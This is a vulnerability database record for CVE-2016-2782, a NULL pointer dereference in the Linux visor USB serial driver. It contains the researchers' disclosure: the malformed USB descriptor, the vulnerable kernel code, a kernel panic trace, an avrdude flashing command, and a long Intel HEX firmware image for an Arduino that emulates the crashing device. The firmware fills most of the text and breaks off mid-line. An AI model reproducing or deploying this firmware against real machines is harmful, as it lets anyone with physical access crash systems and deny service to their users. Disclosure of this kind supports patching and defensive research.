The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint.
{"prion": [{"lastseen": "2023-11-22T03:30:24", "description": "The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-27T17:59:00", "type": "prion", "title": "Null pointer dereference", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2782"], "modified": "2022-01-31T18:02:00", "id": "PRION:CVE-2016-2782", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-2782", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-01-26T23:22:39", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "zdt", "title": "Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2782"], "modified": "2016-03-09T00:00:00", "id": "1337DAY-ID-25870", "href": "https://0day.today/exploit/description/25870", "sourceData": "Linux visor (treo_attach) Nullpointer Dereference\r\n \r\nDate: March 4th, 2016\r\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\r\nCVE: CVE-2016-2782\r\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\r\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \r\nUSB device descriptors (visor treo_attach driver)\r\nSeverity: Critical. The Kernel panics. A reboot is required.\r\nEase of Exploitation: Trivial\r\nVulnerability type: Wrong input validation\r\nProducts: RHEL 7.1 including all updates\r\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \r\nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\r\nVendor: Red Hat\r\nVendor contacted: November, 12th 2015\r\nPDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf\r\n \r\nAbstract:\r\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \r\ndevice requiring the visor (treo_attach) driver.\r\n \r\nDetailed product description:\r\nWe confirmed the bug on the following system:\r\nRHEL 7.1\r\nKernel 3.10.0-229.20.1.el7.x86_64\r\nFurther products or kernel versions have not been tested.\r\nHow reproducible: Always\r\nActual results: Kernel crashes.\r\n \r\nDescription:\r\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \r\n(github.com/schumilo) using the following device descriptor:\r\n \r\n[*] Device-Descriptor\r\nbLength: 0x12\r\nbDescriptorType: 0x1\r\nbcdUSB: 0x200\r\nbDeviceClass: 0x3\r\nbDeviceSubClass: 0x0\r\nbDeviceProtocol: 0x0\r\nbMaxPacketSize: 0x40\r\nidVendor: 0x82d\r\nidProduct: 0x200\r\nbcdDevice: 0x100\r\niManufacturer: 0x1\r\niProduct: 0x2\r\niSerialNumbers: 0x3\r\nbNumConfigurations: 0x1\r\n \r\nThe treo_attach function does not use the num_ports (struct usb_serial) value \r\nfor any kind of sanity checks during the initialization process. Due to an \r\nincomplete sanity check, the driver could try to dereference a null-pointer if \r\na malformed device-descriptor is presented (zero-value for bNumEndpoints or no \r\nrequired endpoint-descriptors is provided).\r\nThis results in a crash of the system.\r\n \r\n****\r\n...\r\n554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \\ /* Possible \r\nNullpointer-Dereference */\r\n560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0);\r\n573\r\n574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL);\r\n575 if (!swap_port)\r\n576 return -ENOMEM;\r\n577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */\r\n578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */\r\n579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */\r\n...\r\n****\r\n \r\n[*] Configuration-Descriptor\r\nbLength: 0x9\r\nbDescriptorType: 0x2\r\nwTotalLength: 0x27\r\nbNumInterfaces: 0x1\r\nbConfigurationValue: 0x1\r\niConfiguration: 0x0\r\nbmAttributes: 0x0\r\nbMaxPower: 0x31\r\n[*] Interface-Descriptor\r\nbLength: 0x9\r\nbDescriptorType: 0x4\r\nbInterfaceNumber: 0x0\r\nbAlternateSetting: 0x0\r\nbNumEndpoints: 0x3\r\nbInterfaceClass: 0x0\r\nbInterfaceSubClass: 0x0\r\nbInterfaceProtocol: 0x0\r\n[*] Endpoint-Descriptor:\r\nbLength: 0x7\r\nbDescriptorType: 0x5\r\nbEndpointAddress: 0x81 \r\nbmAttribut: 0x3 \r\nwMaxPacketSize: 0x404\r\nbInterval: 0xc\r\n[*] Endpoint-Descriptor:\r\nbLength: 0x7\r\nbDescriptorType: 0x5\r\nbEndpointAddress: 0x1 \r\nbmAttribut: 0x2 \r\nwMaxPacketSize: 0x4\r\nbInterval: 0xc\r\n[*] Endpoint-Descriptor:\r\nbLength: 0x7\r\nbDescriptorType: 0x5\r\nbEndpointAddress: 0x82 \r\nbmAttribut: 0x1\r\nwMaxPacketSize: 0x4\r\nbInterval: 0xc\r\n \r\nProof of Concept:\r\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \r\nfirmware will emulate the defective USB device.\r\n \r\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \r\nflash:w:binary.hex\r\n \r\nThe firmware has been attached to this bug report.\r\nTo prevent the automated delivery of the payload, a jumper may be used to \r\nconnect port D3 and 3V3!\r\n \r\nSeverity and Ease of Exploitation:\r\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \r\nonly physical access to the system is required.\r\n \r\nVendor Communication:\r\nWe contacted Red Hat on the November, 12th 2015.\r\nThis bug was fixed upstream. A CVE number was not assigned.\r\n \r\nReferences:\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283374\r\nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i\r\nd=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0\r\n \r\nKernel Stacktrace:\r\n \r\n[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd\r\n[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200\r\n[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, \r\nSerialNumber=3\r\n[ 35.417186] usb 1-1: Product: \u00c4?\r\n[ 35.421846] usb 1-1: Manufacturer: \u00c4?\r\n[ 35.425686] usb 1-1: SerialNumber: %\r\n[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc \r\nsays 96 microframes\r\n[ 35.493316] usbcore: registered new interface driver visor\r\n[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / \r\nPalm OS\r\n[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0\r\n[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5\r\n[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected\r\n[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at \r\n00000000000000b0\r\n[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]\r\n[ 35.543244] PGD 0 \r\n[ 35.543244] Oops: 0002 [#1] SMP \r\n[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \r\nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \r\nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \r\nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \r\nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \r\niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \r\nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \r\ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \r\ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \r\ndm_mirror dm_region_hash dm_log dm_mod\r\n[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \r\n3.10.0-229.14.1.el7.x86_64 #1\r\n[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \r\nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\r\n[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000\r\n[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>] \r\ntreo_attach+0x61/0x340 [visor]\r\n[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286\r\n[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2\r\n[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400\r\n[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400\r\n[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404\r\n[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400\r\n[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \r\nknlGS:0000000000000000\r\n[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\r\n[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: \r\n00000000000006f0\r\n[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \r\n0000000000000000\r\n[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\r\n[ 35.543244] Stack:\r\n[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007\r\n[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400\r\n[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 \r\nffff88000bcd0090\r\n[ 35.543244] Call Trace:\r\n[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230\r\n[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0\r\n[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0\r\n[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0\r\n[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100\r\n[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\r\n[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\r\n[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0\r\n[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\r\n[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\r\n[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\r\n[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580\r\n[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff\r\n[ 35.543244] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]\r\n[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\r\n[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\r\n[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\r\n[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\r\n[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\r\n[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\r\n[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 \r\n0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> \r\n89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 \r\n[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]\r\n[ 35.543244] RSP <ffff88000bd23a78>\r\n[ 35.543244] CR2: 00000000000000b0\r\n[ 35.973188] ---[ end trace b239663354a1c556 ]---\r\n[ 35.978862] Kernel panic - not syncing: Fatal exception\r\n[ 35.979835] drm_kms_helper: panic occurred, switching back to text console\r\n \r\nArduino Leonardo Firmware:\r\n \r\n:100000000C94A8000C94C5000C94C5000C94C50079\r\n:100010000C94C5000C94C5000C94C5000C94C5004C\r\n:100020000C94C5000C94C5000C94C4050C942F04CA\r\n:100030000C94C5000C94C5000C94C5000C94C5002C\r\n:100040000C94C5000C94C5000C94C5000C94C5001C\r\n:100050000C94C5000C94C5000C94C5000C940E02C1\r\n:100060000C94C5000C94C5000C94C5000C94C500FC\r\n:100070000C94C5000C94C5000C94C5000C94C500EC\r\n:100080000C94C5000C94C5000C94C5000C94C500DC\r\n:100090000C94C5000C94C5000C94C5000C94C500CC\r\n:1000A0000C94C5000C94C5000C94C5000B030E0302\r\n:1000B000010305032F032F032F03120316031A0353\r\n:1000C000200324032F032A030000000200080E006F\r\n:1000D00000030401000B000000000000000000000D\r\n:1000E00000000000000004080201104080401020C1\r\n:1000F00040804080080204018040201002011080EE\r\n:100100001020404004040404040304050202020217\r\n:1001100004030202020206060606060604040202A0\r\n:100120000204000000002300260029002C002F00FC\r\n:1001300000000000250028002B002E0031000000E8\r\n:100140000000240027002A002D00300000C180811B\r\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\r\n:10016000B1E0E4EDF3E102C005900D92A436B107D1\r\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\r\n:10018000E1F70E94C8000C9404070C940000089545\r\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\r\n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B\r\n:1001B00083E00E94300361E087E00E94300361E049\r\n:1001C00088E00E9430030E9459067E012AE9E20E6F\r\n:1001D000F11C84E093E0D70111969C938E9389E003\r\n:1001E00094E013969C938E93129782E2E2E1F1E001\r\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\r\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\r\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\r\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\r\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\r\n:10024000992ED901E92D1D92EA95E9F78E010957FA\r\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\r\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\r\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\r\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\r\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\r\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\r\n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188\r\n:1002C0009C92F4E01196FC9311971496EC93F9012B\r\n:1002D000DC01292D01900D922A95E1F7FE01EC56E3\r\n:1002E000FF4FDC011B96FC93EE931A971D96BC9270\r\n:1002F000AE921C971183008373836283558344837A\r\n:100300000C5211092CE0F80111922A95E9F721E02D\r\n:10031000D80119962C931997FE01E059FF4F0190CF\r\n:100320000D929A94E1F7F8019387828761E088E063\r\n:100330000E9469038BE492E00E94650688E892E0DF\r\n:100340000E94650687EC92E00E94650686E093E0D5\r\n:100350000E94650682E493E00E9465068FE793E0C1\r\n:100360000E94650684EA93E00E9465068BEE93E0A6\r\n:100370000E94650683E00E949F03892B09F047C015\r\n:100380005E01F3E2AF0EB11C8824839482E1982EC3\r\n:1003900084E194E00E946506BF92AF92DF92CF9213\r\n:1003A000FF92EF921F928F921F930F932DB73EB73C\r\n:1003B000225131090FB6F8943EBF0FBE2DBFADB725\r\n:1003C000BEB71196FE01FB96892D01900D928A957C\r\n:1003D000E1F78DE695E00E94030668E873E180E0AE\r\n:1003E00090E00E947B028DE695E00E944E0660E060\r\n:1003F00087E00E94690368E873E180E090E00E9472\r\n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E\r\n:1004100070E080E090E00E947B02ACCF1F920F92D0\r\n:100420000FB60F9211242F933F938F939F93AF9307\r\n:10043000BF938091650590916605A0916705B09185\r\n:1004400068053091640523E0230F2D3720F40196D1\r\n:10045000A11DB11D05C026E8230F0296A11DB11DE7\r\n:10046000209364058093650590936605A0936705C6\r\n:10047000B09368058091690590916A05A0916B051C\r\n:10048000B0916C050196A11DB11D809369059093F3\r\n:100490006A05A0936B05B0936C05BF91AF919F91D6\r\n:1004A0008F913F912F910F900FBE0F901F90189535\r\n:1004B0003FB7F8948091690590916A05A0916B050A\r\n:1004C000B0916C0526B5A89B05C02F3F19F0019689\r\n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C\r\n:1004E000711D811D911D42E0660F771F881F991FA6\r\n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372\r\n:10050000DF936B017C010E945802EB01C114D104FE\r\n:10051000E104F10479F00E9458026C1B7D0B683EE7\r\n:100520007340A0F381E0C81AD108E108F108C8516E\r\n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029\r\n:100540000895789484B5826084BD84B5816084BD4B\r\n:1005500085B5826085BD85B5816085BDEEE6F0E03C\r\n:10056000808181608083E1E8F0E010828081826098\r\n:100570008083808181608083E0E8F0E08081816019\r\n:100580008083E1E9F0E08081826080838081816006\r\n:100590008083E0E9F0E0808181608083E1ECF0E03D\r\n:1005A000808184608083808182608083808181609B\r\n:1005B0008083E3ECF0E0808181608083E0ECF0E018\r\n:1005C000808182608083E2ECF0E0808181608083C2\r\n:1005D000EAE7F0E0808184608083808182608083AC\r\n:1005E000808181608083808180688083089590E02D\r\n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B\r\n:10060000AB09809180008F7703C0809180008F7D3F\r\n:1006100080938000089584B58F7702C084B58F7D64\r\n:1006200084BD0895809190008F7707C080919000DD\r\n:100630008F7D03C080919000877F80939000089504\r\n:100640008091C0008F7703C08091C0008F7D809320\r\n:10065000C00008958091C200877F8093C2000895F2\r\n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E\r\n:10067000EC5FFE4F8491882349F190E0880F991F29\r\n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0\r\n:10069000C591D4919FB7611108C0F8948C912095B1\r\n:1006A00082238C93888182230AC0623051F4F894AB\r\n:1006B0008C91322F309583238C938881822B888371\r\n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3\r\n:1006D00008950F931F93CF93DF931F92CDB7DEB78B\r\n:1006E000282F30E0F901E853FF4F8491F901EA51D6\r\n:1006F000FF4F1491F901EC5FFE4F04910023C9F004\r\n:10070000882321F069830E94F7026981E02FF0E0DD\r\n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7\r\n:100720008C91611103C01095812301C0812B8C93A2\r\n:100730009FBF0F90DF91CF911F910F910895CF939D\r\n:10074000DF93282F30E0F901E853FF4F8491F9013E\r\n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5\r\n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5\r\n:10077000EE5DFE4FA591B4912C912D2381E090E088\r\n:1007800021F480E002C080E090E0DF91CF910895F5\r\n:10079000615030F02091F100FC0120830196F8CFE8\r\n:1007A000289884E680937D0508951092E9001092C0\r\n:1007B00071051092700590936F0580936E050895F2\r\n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3\r\n:1007D000BA01C8010E94A606F80120E030E08EEFC1\r\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132\r\n:1007F000609170057091710540916E0550916F0583\r\n:1008000064177507ACF49091E8009570E1F390914E\r\n:10081000E80092FD1CC0A093F100A0917005B0917A\r\n:1008200071051196AF73BB27AB2B11F48093E800D1\r\n:10083000A0917005B09171051196B0937105A093C8\r\n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC\r\n:100850009FEFDF91CF911F910F91FF9008951F920D\r\n:100860000F920FB60F9211246F927F928F929F92E8\r\n:10087000AF92BF92CF92DF92EF92FF920F931F93AE\r\n:100880002F933F934F935F936F937F938F939F9398\r\n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3\r\n:1008A0006297DEBFCDBF1092E9008091E80083FF20\r\n:1008B00046C168E0CE010A960E94C80382EF809389\r\n:1008C000E8009A8597FF05C08091E80080FFFCCF83\r\n:1008D00003C08EEF8093E800892F807609F023C152\r\n:1008E0008B85811105C01092F1001092F10020C19A\r\n:1008F000282F2D7F213009F41BC1853049F48091C8\r\n:10090000E80080FFFCCF8C8580688093E30010C1F5\r\n:10091000863009F0E1C02D8508891989223009F057\r\n:10092000B3C0EC848E2D90E0209173053091740556\r\n:10093000821793070CF09FC00E94D5031F92EF927D\r\n:100940008DE394E09F938F930E9483068CE0E89E52\r\n:1009500070011124E0917505F0917605EE0DFF1DF3\r\n:1009600089E0DE01119601900D928A95E1F7C801A8\r\n:100970000E94D50349E050E0BE016F5F7F4F80E0E9\r\n:100980000E94E0030F900F900F900F90C12CD12C7C\r\n:10099000612C712C33E7A32E34E0B32E4AEA842E67\r\n:1009A00044E0942EE0917505F0917605EE0DFF1D63\r\n:1009B000818590E0681679060CF0BAC07F926F923C\r\n:1009C000BF92AF920E948306E0917505F091760583\r\n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5\r\n:1009E00080E00E94E0030F900F900F900F9000E0C6\r\n:1009F00010E0E0917505F0917605EE0DFF1D028483\r\n:100A0000F385E02DEC0DFD1D818590E00817190799\r\n:100A10005CF51F930F939F928F920E948306E09143\r\n:100A20007505F0917605EE0DFF1D0284F385E02D2E\r\n:100A3000EC0DFD1DC801880F991FA485B585A80F71\r\n:100A4000B91F4D915C910284F385E02DE80FF91FE9\r\n:100A50006081718180E00E94E0030F5F1F4F0F9063\r\n:100A60000F900F900F90C5CF8FEF681A780A8EE025\r\n:100A7000C80ED11C97CF8FED94E09F938F930E9467\r\n:100A800083060F900F9058C0C8012A8B0E94D5038F\r\n:100A90002A892130C1F0233009F04EC08C851F9285\r\n:100AA0008F9389EF94E09F938F930E94830642E097\r\n:100AB00050E062E871E080E00E94E0030F900F9048\r\n:100AC0000F900F9035C04091000150E060E071E060\r\n:100AD00080E00E94E0032CC0873071F1883021F45F\r\n:100AE00081E08093F10024C0893011F5937021F5E5\r\n:100AF000EDE4F1E081E021E096E38093E9002093CA\r\n:100B0000EB0034913093EC009093ED008F5F3196C1\r\n:100B1000843099F78EE78093EA001092EA008C8582\r\n:100B20008093720505C0888999890E94D50304C005\r\n:100B30008EEF8093E80003C081E28093EB00629621\r\n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE\r\n:100B5000EF91BF91AF919F918F917F916F915F9135\r\n:100B60004F913F912F911F910F91FF90EF90DF9048\r\n:100B7000CF90BF90AF909F908F907F906F900F908D\r\n:100B80000FBE0F901F9018951F920F920FB60F92E5\r\n:100B900011248F939F938091E1001092E10083FFD5\r\n:100BA0000FC01092E90091E09093EB001092EC00DE\r\n:100BB00092E39093ED001092720598E09093F0000C\r\n:100BC00082FF1AC080917E05882339F080917E05CE\r\n:100BD000815080937E05882369F080917D0588236C\r\n:100BE00059F080917D05815080937D05811104C06D\r\n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE\r\n:100C00000F901F901895CF93DF93CDB7DEB782E199\r\n:100C1000FE013596A0E0B1E001900D928A95E1F7D2\r\n:100C20008F89988D9093760580937505898D9A8D1F\r\n:100C300090937405809373058B8D9C8D90937C05A8\r\n:100C400080937B058D8D9E8D90937A058093790599\r\n:100C50008F8D98A1909378058093770510927205F7\r\n:100C600081E08093D70080EA8093D80082E189BD3B\r\n:100C700009B400FEFDCF61E070E080E090E00E94EA\r\n:100C80007B0280E98093D8008CE08093E200109290\r\n:100C9000E000559A209ADF91CF91089581E08093EA\r\n:100CA000E00008959091C80095FFFCCF8093CE009E\r\n:100CB00008951092CD0087E68093CC0088E1809360\r\n:100CC000C9008EE08093CA0008950F931F93CF93BD\r\n:100CD000DF93EC018C01FE0101900020E9F73197D0\r\n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E\r\n:100CF000F80181918F010E945206EDCFDF91CF91D3\r\n:100D00001F910F910895CF93DF93CDB7DEB7DA959A\r\n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6\r\n:100D2000419151919F0160E071E0CE0101960E94D6\r\n:100D30000707CE0101960E946506D3950FB6F89479\r\n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE\r\n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9\r\n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E\r\n:100D70003F932F9389839A830E9483068981882ECB\r\n:100D80009A81992E0F900F9000E010E08EE5E82EEA\r\n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5\r\n:100DA000E4F4F40181914F0190E09F938F93FF92BF\r\n:100DB000EF920E9483060F5F1F4FC8018F70992723\r\n:100DC0000F900F900F900F90892B41F7DF92CF92E9\r\n:100DD0000E9483060F900F90E1CF81E194E09F93F2\r\n:100DE0008F930E9483060F900F900F900F90DF91CA\r\n:100DF000CF911F910F91FF90EF90DF90CF90BF9018\r\n:100E0000AF909F908F900895F8940C94E809AEE00D\r\n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8\r\n:100E20004C831A83098377FF02C060E070E8615049\r\n:100E300071097E836D83A901BC01CE0101960E94D8\r\n:100E400033074D815E8157FD0AC02F8138854217D7\r\n:100E500053070CF49A01F801E20FF31F10822E964B\r\n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB\r\n:100E7000B1097C016B018A01FC0117821682838112\r\n:100E800081FFBDC1CE0101964C01F7019381F601AE\r\n:100E900093FD859193FF81916F01882309F4ABC184\r\n:100EA000853239F493FD859193FF81916F018532ED\r\n:100EB00029F4B70190E00E941B09E7CF512C312C97\r\n:100EC00020E02032A0F48B3269F030F4803259F007\r\n:100ED000833269F420612CC08D3239F0803339F4CB\r\n:100EE000216026C02260246023C0286021C027FD25\r\n:100EF00027C030ED380F3A3078F426FF06C0FAE00C\r\n:100F00005F9E300D1124532E13C08AE0389E300DA1\r\n:100F10001124332E20620CC08E3221F426FD6BC1C9\r\n:100F2000206406C08C3611F4206802C0883641F473\r\n:100F3000F60193FD859193FF81916F018111C1CFDE\r\n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B\r\n:100F5000F9830DC0833631F0833771F0833509F0A2\r\n:100F60005BC022C0F801808189830E5F1F4F44243B\r\n:100F70004394512C540115C03801F2E06F0E711CDE\r\n:100F8000F801A080B18026FF03C0652D70E002C08B\r\n:100F90006FEF7FEFC5012C870E9410092C018301A0\r\n:100FA0002C852F77222E17C03801F2E06F0E711CAE\r\n:100FB000F801A080B18026FF03C0652D70E002C05B\r\n:100FC0006FEF7FEFC5012C870E9405092C012C854E\r\n:100FD0002068222E830123FC1BC0832D90E048163D\r\n:100FE0005906B0F4B70180E290E00E941B093A94E0\r\n:100FF000F4CFF50127FC859127FE81915F01B701B0\r\n:1010000090E00E941B0931103A94F1E04F1A510808\r\n:101010004114510471F7E5C0843611F0893639F571\r\n:10102000F80127FF07C060817181828193810C5F85\r\n:101030001F4F08C060817181882777FD8095982FA8\r\n:101040000E5F1F4F2F76B22E97FF09C090958095A7\r\n:10105000709561957F4F8F4F9F4F2068B22E2AE089\r\n:1010600030E0A4010E944D09A82EA81844C085377D\r\n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E\r\n:10108000BF2E8F36C1F018F4883579F0B4C08037A0\r\n: